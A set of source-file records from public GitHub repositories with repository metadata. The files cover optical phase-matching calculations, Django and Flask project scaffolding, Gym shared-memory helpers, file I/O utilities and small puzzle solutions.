c = n_o**2 - n_e**2 * n_o**2 / (n_soln**2)
x = ( -b + np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if x < 0:
x = ( -b - np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if np.isnan(np.arccos(x)) :
raise exceptions.AttributeError('No phase matching condition.')
theta = np.arccos(x)
print('Angle set to ',360*theta / (2.0*np.pi) )
if RET_WL and return_wavelength:
return (theta, new_wl)
else:
return theta
# phase matching, support various types
def phasematching(self, pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, type = 1, verbose = False):
# conservation of energy: pump_frequency = signal_frequency + idler_frequency
# compute the phasematching wavelength for pulse with no input wavelength
if pump_wl_nm is None or pump_wl_nm == 0:
pump_wl_nm = 1.0/(1.0/idlr_wl_nm + 1.0/sgnl_wl_nm)
if verbose: print('Setting pump wavelength to ', pump_wl_nm)
if sgnl_wl_nm is None or sgnl_wl_nm == 0:
sgnl_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/idler_wl_nm)
if verbose: print('Setting signal wavelength to ', sgnl_wl_nm)
if idlr_wl_nm is None or idlr_wl_nm == 0:
idlr_wl_nm = 1.0/(1.0/pump_wl_nm - 1.0/sgnl_wl_nm)
if verbose: print('Setting idler wavelength to ', idlr_wl_nm)
if type == 1 or type == 'type1':
match_axis = ('e', 'o', 'o') # pump_axis, signal_axis, idler_axis
elif type == 2 or type == 'type2':
match_axis = ('e', 'e', 'o')
elif type == 3 or type == 'type3':
# this is actually called type 2 phasematching,
# we will name it type 3 to dinstinguish from type 2, just for code
match_axis = ('e', 'o', 'e')
if verbose: print('matching at pump {}, signal {}, idler {}'.format(*match_axis))
# compute match refractive index
k_pump0 = 2*np.pi/pump_wl_nm # wave vector of pump pulse in air
n_sgnl = self.n(sgnl_wl_nm, axis = match_axis[1])
k_sgnl = n_sgnl * 2*np.pi/sgnl_wl_nm # wave vector of signal pulse in crystal
n_idlr = self.n(idlr_wl_nm, axis = match_axis[2])
k_idlr = n_idlr * 2*np.pi/idlr_wl_nm # wave vector of pump pulse in crystal
# phasematching condition: k_sgnl + k_idlr = k_pump in crystal
n_soln = (k_sgnl + k_idlr) / k_pump0 # target refractive index for pump if exists
n_o, n_e, n_mix = self.n(pump_wl_nm, 'all') # refractive index data in crystal
# check whether there exists phase matching angle
a = n_e**2 - n_o**2
b = 0.0
c = n_o**2 - n_e**2 * n_o**2 / (n_soln**2)
x = ( -b + np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if x < 0:
x = ( -b - np.sqrt(b**2-4*a*c) )/ (2.0 * a)
if np.isnan(np.arccos(x)) :
theta = None
if verbose: print('No phase matching condition')
else:
theta = 180*np.arccos(x)/np.pi
self.theta = theta
if verbose: print('Angle set to ', theta)
return (theta, pump_wl_nm, n_soln, match_axis[0], sgnl_wl_nm, n_sgnl, match_axis[1], idlr_wl_nm, n_idlr, match_axis[2])
# compute all possible phase matching, similar to qmix in SNLO
def qmix(self, pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, verbose = False):
types = [1, 2, 3]
all_phasematch_results = [self.phasematching(pump_wl_nm, sgnl_wl_nm, idlr_wl_nm, type, verbose) for type in types]
for phasematch_result in all_phasematch_results:
if phasematch_result[0] is not None: # there is phase matching condition
print('phase matching condition: {}({}) = {}({}) + {}({})'.format(phasematch_result[1], phasematch_result[3], phasematch_result[4], phasematch_result[6], phasematch_result[7], phasematch_result[9]))
print('refractive indexes: pump {:.3f}, signal {:.3f}, idler {:.3f}'.format(phasematch_result[2], phasematch_result[5], phasematch_result[8]))
print('phase matching angle (theta): {:.2f} deg'.format(phasematch_result[0]))
print('='*30)
return all_phasematch_results
def sellmier_equation(A, B, C, D, wl_unit = 1):
return lambda wavelength, temperature: np.sqrt(1 + A*(wavelength*wl_unit)**2/((wavelength*wl_unit)**2 - B) + C*(wavelength*wl_unit)**2/((wavelength*wl_unit)**2 - D))
def modified_sellmier_equation(A, B, C, D, E, wl_unit = 1):
# K. W. Kirby and L. G. DeShazer,
# “Refractive indices of 14 nonlinear crystals isomorphic to KH2PO4,”
# J. Opt. Soc. Am. B 4, 1072-1078 (1987).
return lambda wavelength, temperature: np.sqrt(A + (B*C/(C*(wavelength*wl_unit)**2 - 1)) + (D*(wavelength*wl_unit)**2/(E*(wavelength*wl_unit)**2 - 1)))
############################
########## TESTS ###########
############################
# test using KDP data
def KDP_test():
# refractive index from refractiveindex.info
def KDP_n_o(wavelength_nm, temperature):
wl_um = wavelength_nm * 1.0e-3
return np.sqrt(2.259276 + (13.00522*wl_um**2/(wl_um**2 - 400) + 0.01008956/(wl_um**2 - 0.0129426)))
def KDP_n_e(wavelength_nm, temperature):
wl_um = wavelength_nm * 1.0e-3
return np.sqrt(2.132668 + (3.2279924*wl_um**2/(wl_um**2 - 400) + 0.008637494/(wl_um**2 - 0.0122810)))
# refractive index from
# K. W. Kirby and L. G. DeShazer,
# “Refractive indices of 14 nonlinear crystals isomorphic to KH2PO4,”
# J. Opt. Soc. Am. B 4, 1072-1078 (1987).
# KDP_n_o = modified_sellmier_equation(2.257574, 1.0115308e-10, 7.0637619e9, 30.43721e5, 17.27179e5, 1.0e-7)
# KDP_n_e = modified_sellmier_equation(2.129495, 0.96503229e-10, 72.513618e9, 5.924875e5, 7.870713e5, 1.0e-7)
# KDP_n_o = sellmier_equation(1.256618, 0.84478168e-10, 33.89909e5, 1.113904, 1.0e-7)
# KDP_n_e = sellmier_equation(1.131091, 0.8145980e-10, 5.75675e5, 0.8117537, 1.0e-7)
# pack data into dictionary
KDP_data = collections.defaultdict(float, {
'name':'KDP',
'temperature': 273.15 + 33, # kelvin
'length': 10, # mm
'enable_catching': False,
'n_o': KDP_n_o,
'n_e': KDP_n_e,
'n2': 0,
'theta': 0,
'deff': 2.65e-13 # m/V
})
KDP_crystal = genericCrystal(KDP_data)
KDP_crystal.qmix(0, 1053, 1053, False)
if __name__ == '__main__': KDP_test()
| [
"pinkaew@stanford.edu"
] | pinkaew@stanford.edu |
680c21cf0706bd61c182757516285b0c3d931fc4 | 081641354e1a685fc3bb504383bd85b09b47fede | /Pub/urls.py | 1296cdcd8db62fccb0aa9fb5d3bf1f5530b0b7b5 | [] | no_license | nitnelavsT/PeakPoke | e0771afbdbee191a2f224e24531eee38d9e956d3 | 816c655f9b91e6cfd54b694607b417e56d9d34d6 | refs/heads/main | 2023-04-23T17:54:52.342793 | 2021-04-13T17:08:21 | 2021-04-13T17:08:21 | 348,394,175 | 1 | 2 | null | 2021-04-08T16:21:25 | 2021-03-16T15:14:33 | Python | UTF-8 | Python | false | false | 286 | py | from django.conf import settings
from django.conf.urls import url
from django.contrib import admin
from django.urls import include, path
from . import views
urlpatterns = [
path('', views.PubView, name="Pub"),
path('<Pub_id>', views.PubDetail, name="DetailPub"),
] | [
"noreply@github.com"
] | nitnelavsT.noreply@github.com |
6ac225ca6bffd67999e217a1294f2c3b91f43186 | f200553bc6c5222d2bc7de5bd62835c30af3e5ed | /flask_sketch/handlers/api_framework_handler.py | f733056fff62a3323147362fe522314a66fa7c85 | [
"MIT"
] | permissive | ericsouza/flask-sketch | 6a69f3dd143ea30d4e4c72402decb546e1836bbc | 65625a567e5492b3787c5da3ba5e12b1473783c4 | refs/heads/master | 2023-03-27T05:36:23.030008 | 2021-03-17T00:57:22 | 2021-03-17T00:57:22 | 281,234,890 | 11 | 2 | MIT | 2021-03-30T01:32:50 | 2020-07-20T22:03:49 | Python | UTF-8 | Python | false | false | 4,578 | py | import os
from os.path import join as pjoin
from flask_sketch import templates
from flask_sketch.sketch import Sketch
from flask_sketch.const import requirements as reqs
from flask_sketch.utils import GenericHandler
def restx_handler(sketch: Sketch):
if sketch.api_framework == "restx":
sketch.add_requirements(reqs.FLASK_RESTX)
os.makedirs(pjoin(sketch.app_folder, "api", "resources", "examples"))
open(
pjoin(
sketch.app_folder,
"api",
"resources",
"examples",
"__init__.py",
),
"a",
).close()
if sketch.api_auth_framework == "jwt_extended":
sketch.write_template(
"api_init_restx_jwtext_tpl",
templates.api,
pjoin(sketch.app_folder, "api", "__init__.py"),
)
else:
sketch.write_template(
"api_init_restx_noauth_tpl",
templates.api,
pjoin(sketch.app_folder, "api", "__init__.py"),
)
if sketch.api_auth_framework == "none":
resource_tpl = "api_examples_restx_pet_tpl"
else:
resource_tpl = "api_examples_restx_pet_auth_tpl"
sketch.write_template(
resource_tpl,
templates.api.resources.examples,
pjoin(sketch.app_folder, "api", "resources", "examples", "pet.py"),
)
if sketch.database == "mongodb":
example_tpl_model = "pet_mongo_tpl"
else:
example_tpl_model = "pet_sql_tpl"
sketch.write_template(
example_tpl_model,
templates.models.examples,
pjoin(sketch.app_folder, "models", "examples", "pet.py"),
)
return True
def smorest_handler(sketch: Sketch):
if sketch.api_framework == "smorest":
sketch.add_requirements(reqs.FLASK_SMOREST)
sketch.settings["default"]["API_TITLE"] = sketch.project_name
sketch.settings["default"]["API_VERSION"] = "v1"
sketch.settings["default"]["OPENAPI_VERSION"] = "3.0.2"
sketch.settings["default"]["OPENAPI_JSON_PATH"] = "api-spec.json"
sketch.settings["default"]["OPENAPI_URL_PREFIX"] = "/openapi"
sketch.settings["default"]["OPENAPI_REDOC_PATH"] = "/redoc"
sketch.settings["default"][
"OPENAPI_REDOC_URL"
] = "https://cdn.jsdelivr.net/npm/redoc@next/bundles/redoc.standalone.js" # noqa
sketch.settings["default"]["OPENAPI_SWAGGER_UI_PATH"] = "/swagger-ui"
sketch.settings["default"][
"OPENAPI_SWAGGER_UI_URL"
] = "https://cdn.jsdelivr.net/npm/swagger-ui-dist/"
sketch.add_extensions("api")
os.makedirs(pjoin(sketch.app_folder, "api", "resources", "examples"))
open(
pjoin(
sketch.app_folder,
"api",
"resources",
"examples",
"__init__.py",
),
"a",
).close()
if sketch.api_auth_framework == "jwt_extended":
sketch.write_template(
"api_init_jwt_extended_tpl",
templates.api,
pjoin(sketch.app_folder, "api", "__init__.py"),
)
sketch.write_template(
"ext_api_smorest_tpl",
templates.ext,
pjoin(sketch.app_folder, "ext", "api.py"),
)
if sketch.api_auth_framework == "none":
resource_tpl = "api_example_smorest_pet_tpl"
else:
resource_tpl = "api_example_smorest_pet_auth_tpl"
sketch.write_template(
resource_tpl,
templates.api.resources.examples,
pjoin(sketch.app_folder, "api", "resources", "examples", "pet.py"),
)
if sketch.database == "mongodb":
example_tpl_model = "pet_mongo_tpl"
else:
example_tpl_model = "pet_sql_tpl"
sketch.write_template(
example_tpl_model,
templates.models.examples,
pjoin(sketch.app_folder, "models", "examples", "pet.py"),
)
return True
def restful_handler(sketch: Sketch):
if sketch.api_framework == "restful":
return True
def none_handler(sketch: Sketch):
if sketch.api_framework == "none":
return True
class ApiFrameworkHandler(GenericHandler):
...
api_framework_handler = ApiFrameworkHandler(
restx_handler, smorest_handler, restful_handler, none_handler,
)
| [
"ericsouza0801@gmail.com"
] | ericsouza0801@gmail.com |
148e209d46c7be46d45fb222ec36e6fd80c00963 | 1514d33d13c03b2802b07f4df553d6b6085d9e05 | /Objects_and_Selections/list_colors.py | ac2bc2f4c708685f6fe7df9c8cb99c72c33cfd97 | [] | no_license | inchoate/Pymol-script-repo | 8eeab25ffc1c912454edac86ce3363b7a97dc8b9 | c31b8ba45bf36880b3bbac12bc5037151bb5d187 | refs/heads/master | 2021-01-16T07:09:10.847023 | 2011-04-06T07:17:28 | 2011-04-06T07:17:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | #
# This is how to do it from the PyMOL command line or .pml script:
#
iterate all, print color
#! /usr/bin/python
#
# and this in a Python script
#
import pymol
pymol.color_list = []
cmd.iterate('all', 'pymol.color_list.append(color)')
print pymol.color_list
| [
"jlec@j-schmitz.net"
] | jlec@j-schmitz.net |
fbf516fe4394792fc23ef89eabd0e7246aecf87f | 4bbac84a15fd45bbd5639588c6fd137b993e1700 | /urlshortener.py | e0f1328f7159d1a851b1cbb1a7bde0eb42182ca9 | [] | no_license | omini25/Python-Projects | 5fe87394f3eac874840a8021c3e24408ff5863ff | 9733a0b519fd1d3f12888b2f2d5d67a6952e5d04 | refs/heads/master | 2023-03-24T21:43:13.859673 | 2021-03-24T09:49:22 | 2021-03-24T09:49:22 | 351,025,785 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | import pyshorteners
url = input('Enter url to be shortened: ')
shortener = pyshorteners.Shortener()
shorts = shortener.tinyurl.short(url)
print(shorts) | [
"david.igiebor@yahoo.com"
] | david.igiebor@yahoo.com |
c25921b5bb4731635cf3d1b7bd4d68d97291f809 | 38fa16204c98f3b76d7b50f091c4be37d0a701b4 | /practise/008/userinfo.py | dba81c40f8e713f13ee66850a1abaf036e3c40e5 | [] | no_license | wangyouyan/Python | 989ca5be89d63ea729350628ed1236c95d17b38a | 164221a6e5c1216b310ec5bfbdeb5a314fdf07ea | refs/heads/master | 2020-04-05T23:19:27.849083 | 2017-02-10T12:12:56 | 2017-02-10T12:12:56 | 46,403,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author:Rain Wang
#E-mail:wyyservice@gmail.com
def get_user():
#obj = SqlHelper()
obj = SqlHelper.instance()
obj.fetch()
print id(obj)
return '1'
def del_user():
#obj = SqlHelper()
obj = SqlHelper.instance()
obj.remove()
return '1' | [
"wyyservice@gmail.com"
] | wyyservice@gmail.com |
f692582b38415ba143f8127110a30effb73043cf | 4b3b541280aecc745cc566d1f23ffdaf89ecbf7e | /day11-1.py | b14f2329995e593a25d2998c0ae105ff6db99b40 | [] | no_license | BenSchomp/adventofcode2018 | f075320f51d16baaf3426c5fe8f2d57be851a089 | bacd1f83460adbe3965c972791f096f8887fcc50 | refs/heads/master | 2020-04-09T06:07:23.310349 | 2018-12-12T06:40:59 | 2018-12-12T06:40:59 | 160,099,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 703 | py | serialNumber = 8868
def getCellScore( x, y ):
rackId = x + 10
powerLevel = rackId * y
powerLevel += serialNumber
powerLevel *= rackId
powerLevel = int(powerLevel / 100)
powerLevel = powerLevel % 10
powerLevel -= 5
return powerLevel
def getSquareScore( x, y ):
squareScore = 0
for i in range(3):
for j in range(3):
squareScore += getCellScore( x+i, y+j )
return squareScore
scores = {}
for y in range(1, 297):
for x in range(1, 297):
squareScore = getSquareScore( x, y )
scores[x,y] = squareScore
results = sorted(scores, key=scores.get)
result = results.pop()
print( 'x,y:', result )
print( 'largest power level:', getSquareScore( result[0], result[1] ) )
| [
"ben@benschomp.com"
] | ben@benschomp.com |
931ff4decea9ba0390f54c1e38fc3db017d63a1b | aecc2b15fe59e9678ff480487d04155ee8b1723c | /Lesson5/6.py | 3ff0180cdc2eedc744742ada8941bacecada1a8a | [] | no_license | oLONIo/python | 4ba9038c1c1cfd9220aa0ae8176b860fa264f55e | 1d23b026727c9270a016a26366eafe333671a3b4 | refs/heads/main | 2023-08-12T07:24:41.413488 | 2021-09-27T21:40:09 | 2021-09-27T21:40:09 | 402,148,179 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | dict = {}
with open('test6.txt', 'r', encoding='utf-8') as kek:
for line in kek:
hrs = line.replace('(', ' ').split()
dict[hrs[0][:-1]] = sum(int(i) for i in hrs if i.isdigit())
print(dict) | [
"zomby2005@gmail.com"
] | zomby2005@gmail.com |
9dccf3fce678428834b1b6d44b3078a9f3d10912 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /qNQkYzY8GpiFMmndh_15.py | 04665608d5fe8d6044d89c6b6ab5a3f91fff7fbe | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,242 | py | """
Write a function that connects each previous word to the next word by the
shared letters. Return the resulting string (removing **duplicate characters**
in the overlap) and the **minimum** number of shared letters across all pairs
of strings.
### Examples
join(["oven", "envier", "erase", "serious"]) ➞ ["ovenvieraserious", 2]
join(["move", "over", "very"]) ➞ ["movery", 3]
join(["to", "ops", "psy", "syllable"]) ➞ ["topsyllable", 1]
# "to" and "ops" share "o" (1)
# "ops" and "psy" share "ps" (2)
# "psy" and "syllable" share "sy" (2)
# the minimum overlap is 1
join(["aaa", "bbb", "ccc", "ddd"]) ➞ ["aaabbbcccddd", 0]
### Notes
More specifically, look at the overlap between the previous words **ending
letters** and the next word's **beginning letters**.
"""
def join(lst):
out, min_overlap,overlap=lst[0],10**9,0
out=lst[0]
for i in range (len(lst)-1):
overlap=0
for j in range (min(len(lst[i]),len(lst[i+1]))):
if lst[i][len(lst[i])-1-j:]==lst[i+1][:j+1]:
overlap=j+1
if (overlap < min_overlap):
min_overlap=overlap
out+=lst[i+1][overlap:]
if(min_overlap==10**9):
min_overlap=0
return [out, min_overlap]
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
eb89e1fda1e5910212522c3fc8577fa1876daf61 | 69b3fad3677f6747e8f9a61fd0f1d4b76dda1a39 | /setup.py | fb3e9eef276fafa53412e4d6afe00a487870e47c | [
"MIT"
] | permissive | xlash/utilities | 095afe9628aa976a6466111f45a75ce9c2ee2155 | 5be5b3389b9185bc2a7c33c73d582bd4da03f9dd | refs/heads/master | 2021-11-26T04:23:31.244729 | 2021-11-20T20:32:12 | 2021-11-20T20:32:12 | 76,275,287 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | from setuptools import find_packages, setup
from utilities import __version__
setup(
name='utilities',
version=__version__,
license='BSD',
author='GNM',
author_email='solutiondb@gmail.com',
description='Utils lib for utils methods',
url='https://github.com/xlash/utils',
install_requires=['curtsies', 'decorator', 'python-dateutil', 'pyyaml', 'multiprocessing_logging'],
packages=find_packages(),
)
| [
"guillaume.nourry.marquis@gmail.com"
] | guillaume.nourry.marquis@gmail.com |
148becdb0e76e3891732d79b23892af820fa597a | a7bca6f23b047860b1f00f1e49a9cdaf30a1325c | /src/fiwtools/utils/io.py | 8f7f754d2df1811072b09f4fbfd095a12289286f | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | visionjo/FIW_KRT | ad0a14bf7433bdee461562dfea5e0f4068e0d4ba | bc07ba242ccaf762a55c80204d7da05d55847ec5 | refs/heads/master | 2022-10-03T05:27:32.698912 | 2019-09-11T19:13:00 | 2019-09-11T19:13:00 | 103,139,927 | 28 | 8 | MIT | 2022-09-19T19:14:09 | 2017-09-11T13:33:54 | Python | UTF-8 | Python | false | false | 6,500 | py | from __future__ import print_function
import io
import os
import string
import warnings as warn
import scipy.io as scio
import numpy as np
from .common import is_numpy
def csv_list(imdir):
"""Return a list of absolute paths of *.csv files in current directory"""
return [os.path.join(imdir, item) for item in os.listdir(imdir) if is_csv(item)]
def dir_list(indir):
"""return list of directories in a directory"""
return [os.path.abspath(os.path.join(indir, item)) for item in os.listdir(indir) if
(os.path.isdir(os.path.join(indir, item)) and not is_hidden_file(item))]
def file_base(filename):
"""Return c for filename /a/b/c.ext"""
(head, tail) = os.path.split(filename)
(base, ext) = os.path.splitext(tail)
return base
def file_ext(filename):
"""Given filename /a/b/c.ext return .ext"""
(head, tail) = os.path.split(filename)
try:
parts = string.rsplit(tail, '.', 2)
if len(parts) == 3:
ext = '.%s.%s' % (parts[1], parts[2]) # # tar.gz
else:
ext = '.' + parts[1]
except:
ext = None
return ext
def parent_dir(filename):
"""Return /a/b for filename /a/b/c.ext"""
(head, tail) = os.path.split(filename)
return head
def pklist(imdir):
"""Return a list of absolute paths of *.pk files in current directory"""
return [os.path.join(imdir, item) for item in os.listdir(imdir) if is_pickle(os.path.join(imdir, item))]
def file_tail(filename):
"""Return c.ext for filename /a/b/c.ext"""
(head, tail) = os.path.split(filename)
return tail
def is_img(path):
"""Is object an image with a known extension ['.jpg','.jpeg','.png','.tif','.tiff','.pgm','.ppm','.gif','.bmp']?"""
(filename, ext) = os.path.splitext(path)
return ext.lower() in ['.jpg', '.jpeg', '.png', '.tif', '.tiff', '.pgm', '.ppm', '.gif', '.bmp']
def is_pickle(filename):
"""Is the file a pickle archive file"""
return is_file(filename) and os.path.exists(filename) and file_ext(filename).lower() in ['.pk', '.pkl']
def is_text_file(path):
"""Is the given file a text file?"""
(filename, ext) = os.path.splitext(path)
return ext.lower() in ['.txt'] and (filename[0] != '.')
def is_video(path):
"""Is a file a video with a known video extension ['.avi','.mp4','.mov','.wmv','.mpg']?"""
(filename, ext) = os.path.splitext(path)
return ext.lower() in ['.avi', '.mp4', '.mov', '.wmv', 'mpg']
def is_csv(path):
"""Is a file a CSV file extension?"""
(filename, ext) = os.path.splitext(path)
return ext.lower() in ['.csv', '.CSV']
def is_file(path):
"""Wrapper for os.path.is_file"""
return os.path.isfile(str(path))
def is_dir(path):
"""Wrapper for os.path.isdir"""
return os.path.isdir(path)
def is_hidden_file(filename):
"""Does the filename start with a period?"""
return filename[0] == '.'
def load_mat(matfile):
return scio.loadmat(matfile)
def readcsv(infile, separator=','):
"""Read a csv file into a list of lists"""
with open(infile, 'r') as f:
list_of_rows = [[x.strip() for x in r.split(separator)] for r in f.readlines()]
return list_of_rows
def readlist(infile):
"""Read each row of file as an element of the list"""
with open(infile, 'r') as f:
list_of_rows = [r for r in f.readlines()]
return list_of_rows
def read_mat(txtfile, delimiter=' '):
"""Whitespace separated values defining columns, lines define rows. Return numpy array"""
with open(txtfile, 'rb') as csvfile:
M = [np.float32(row.split(delimiter)) for row in csvfile]
return np.array(M)
def readtxt(ifile):
""" Simple function to read text file and remove clean ends of spaces and \n"""
with open(ifile, 'r') as f:
content = f.readlines()
# remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
return content
def sys_home():
"""
:return: Home directory (platform agnostic)
"""
return os.path.expanduser("~") + os.path.pathsep
def mkdir(output):
"""
Make directory if does not already exist.
:param output:
:return: True if no directory exists, and 'output' was made; else, False.
"""
if not os.path.exists(output):
os.makedirs(output)
return True
return False
def filepath(filename):
"""Return /a/b for filename /a/b/c.ext"""
(head, tail) = os.path.split(filename)
return head
def newpath(filename, newdir):
"""Return /a/b for filename /a/b/c.ext"""
(head, tail) = os.path.split(filename)
return os.path.join(newdir, tail)
def videolist(videodir):
"""return list of images with absolute path in a directory"""
return [os.path.abspath(os.path.join(videodir, item)) for item in os.listdir(videodir) if
(is_video(item) and not is_hidden_file(item))]
def writecsv(list_of_tuples, outfile, mode='w', separator=','):
"""Write list of tuples to output csv file with each list element on a row and tuple elements separated by comma"""
list_of_tuples = list_of_tuples if not is_numpy(list_of_tuples) else list_of_tuples.tolist()
with open(outfile, mode) as f:
for u in list_of_tuples:
n = len(u)
for (k, v) in enumerate(u):
if (k + 1) < n:
f.write(str(v) + separator)
else:
f.write(str(v) + '\n')
return outfile
def writelist(mylist, outfile, mode='w'):
"""Write list of strings to an output file with each row an element of the list"""
with open(outfile, mode) as f:
for s in mylist:
f.write(str(s) + '\n')
return (outfile)
def txtlist(imdir):
"""Return a list of absolute paths of *.txt files in current directory"""
return [os.path.join(imdir, item) for item in os.listdir(imdir) if io.is_text_file(item) and not io.is_hidden_file(item)]
def check_paths(*paths):
"""
Function that checks variable number of files (i.e., unordered arguments, *paths). If any of the files do not exist '
then function fails (i.e., no info about failed indices, but just pass (True) or fail (False))
:param paths: unordered args, each pointing to file.
:return:
"""
do_exist = True
for x, path in enumerate(paths):
if not os.path.isfile(path):
warn.warn(str(x) + ") File not found: " + path)
do_exist = False
return do_exist | [
"robinson.jo@husky.neu.edu"
] | robinson.jo@husky.neu.edu |
0cf0e7bca8f20419ea4d9ea8e7f0ef30f50527ee | 9c5e09b4f048a13961c0f4a1370a7bf01a421d92 | /gym/vector/utils/shared_memory.py | b9437814da8b9effa7bf5d1ba032e233e777c442 | [
"MIT"
] | permissive | StanfordVL/Gym | daa8c780f5ace3e33c3bf0f7109f40a0a820d59e | 5e14d19e57d8ba318b97a5edda0ab2ea591dea08 | refs/heads/master | 2023-02-03T02:44:40.185713 | 2020-12-17T14:10:16 | 2020-12-17T14:10:16 | 280,579,514 | 9 | 4 | null | null | null | null | UTF-8 | Python | false | false | 5,667 | py | import numpy as np
import multiprocessing as mp
from ctypes import c_bool
from collections import OrderedDict
from ... import logger
from ...spaces import Tuple, Dict
from .spaces import _BaseGymSpaces
__all__ = [
'create_shared_memory',
'read_from_shared_memory',
'write_to_shared_memory'
]
def create_shared_memory(space, n=1, ctx=mp):
"""Create a shared memory object, to be shared across processes. This
eventually contains the observations from the vectorized environment.
Parameters
----------
space : `gym.spaces.Space` instance
Observation space of a single environment in the vectorized environment.
n : int
Number of environments in the vectorized environment (i.e. the number
of processes).
ctx : `multiprocessing` context
Context for multiprocessing.
Returns
-------
shared_memory : dict, tuple, or `multiprocessing.Array` instance
Shared object across processes.
"""
if isinstance(space, _BaseGymSpaces):
return create_base_shared_memory(space, n=n, ctx=ctx)
elif isinstance(space, Tuple):
return create_tuple_shared_memory(space, n=n, ctx=ctx)
elif isinstance(space, Dict):
return create_dict_shared_memory(space, n=n, ctx=ctx)
else:
raise NotImplementedError()
def create_base_shared_memory(space, n=1, ctx=mp):
dtype = space.dtype.char
if dtype in '?':
dtype = c_bool
return ctx.Array(dtype, n * int(np.prod(space.shape)))
def create_tuple_shared_memory(space, n=1, ctx=mp):
return tuple(create_shared_memory(subspace, n=n, ctx=ctx)
for subspace in space.spaces)
def create_dict_shared_memory(space, n=1, ctx=mp):
return OrderedDict([(key, create_shared_memory(subspace, n=n, ctx=ctx))
for (key, subspace) in space.spaces.items()])
def read_from_shared_memory(shared_memory, space, n=1):
"""Read the batch of observations from shared memory as a numpy array.
Parameters
----------
shared_memory : dict, tuple, or `multiprocessing.Array` instance
Shared object across processes. This contains the observations from the
vectorized environment. This object is created with `create_shared_memory`.
space : `gym.spaces.Space` instance
Observation space of a single environment in the vectorized environment.
n : int
Number of environments in the vectorized environment (i.e. the number
of processes).
Returns
-------
observations : dict, tuple or `np.ndarray` instance
Batch of observations as a (possibly nested) numpy array.
Notes
-----
The numpy array objects returned by `read_from_shared_memory` shares the
memory of `shared_memory`. Any changes to `shared_memory` are forwarded
to `observations`, and vice-versa. To avoid any side-effect, use `np.copy`.
"""
if isinstance(space, _BaseGymSpaces):
return read_base_from_shared_memory(shared_memory, space, n=n)
elif isinstance(space, Tuple):
return read_tuple_from_shared_memory(shared_memory, space, n=n)
elif isinstance(space, Dict):
return read_dict_from_shared_memory(shared_memory, space, n=n)
else:
raise NotImplementedError()
def read_base_from_shared_memory(shared_memory, space, n=1):
return np.frombuffer(shared_memory.get_obj(),
dtype=space.dtype).reshape((n,) + space.shape)
def read_tuple_from_shared_memory(shared_memory, space, n=1):
return tuple(read_from_shared_memory(memory, subspace, n=n)
for (memory, subspace) in zip(shared_memory, space.spaces))
def read_dict_from_shared_memory(shared_memory, space, n=1):
return OrderedDict([(key, read_from_shared_memory(shared_memory[key],
subspace, n=n)) for (key, subspace) in space.spaces.items()])
def write_to_shared_memory(index, value, shared_memory, space):
"""Write the observation of a single environment into shared memory.
Parameters
----------
index : int
Index of the environment (must be in `[0, num_envs)`).
value : sample from `space`
Observation of the single environment to write to shared memory.
shared_memory : dict, tuple, or `multiprocessing.Array` instance
Shared object across processes. This contains the observations from the
vectorized environment. This object is created with `create_shared_memory`.
space : `gym.spaces.Space` instance
Observation space of a single environment in the vectorized environment.
Returns
-------
`None`
"""
if isinstance(space, _BaseGymSpaces):
write_base_to_shared_memory(index, value, shared_memory, space)
elif isinstance(space, Tuple):
write_tuple_to_shared_memory(index, value, shared_memory, space)
elif isinstance(space, Dict):
write_dict_to_shared_memory(index, value, shared_memory, space)
else:
raise NotImplementedError()
def write_base_to_shared_memory(index, value, shared_memory, space):
size = int(np.prod(space.shape))
destination = np.frombuffer(shared_memory.get_obj(), dtype=space.dtype)
np.copyto(destination[index * size:(index + 1) * size], np.asarray(
value, dtype=space.dtype).flatten())
def write_tuple_to_shared_memory(index, values, shared_memory, space):
for value, memory, subspace in zip(values, shared_memory, space.spaces):
write_to_shared_memory(index, value, memory, subspace)
def write_dict_to_shared_memory(index, values, shared_memory, space):
for key, subspace in space.spaces.items():
write_to_shared_memory(index, values[key], shared_memory[key], subspace)
| [
"shawn@DNa1c068f.SUNet"
] | shawn@DNa1c068f.SUNet |
2cfce4c854012a75cc66bb76be74ba258699c121 | 55477438db40d977c78292ca89af3a517139dbff | /login_and_reg/settings.py | ac2441384f52b35ca46734d39739ee5aef535132 | [] | no_license | Wilsonbluong/The-Wall | aa1528df6eb7f07c5092dfa9db8d258443bbb71c | 3524ed0b716804d3bc7cc791d6ff7a80d4551702 | refs/heads/master | 2023-01-06T02:05:21.361078 | 2020-10-22T18:56:38 | 2020-10-22T18:56:38 | 306,432,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,126 | py | """
Django settings for login_and_reg project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*ke@0&$j7s2a=3fhkc(i-71w0_4-j21u=9vo=o+f!r9axia!8y'
# SECURITY WARNING: don't run with debug turned on in production!
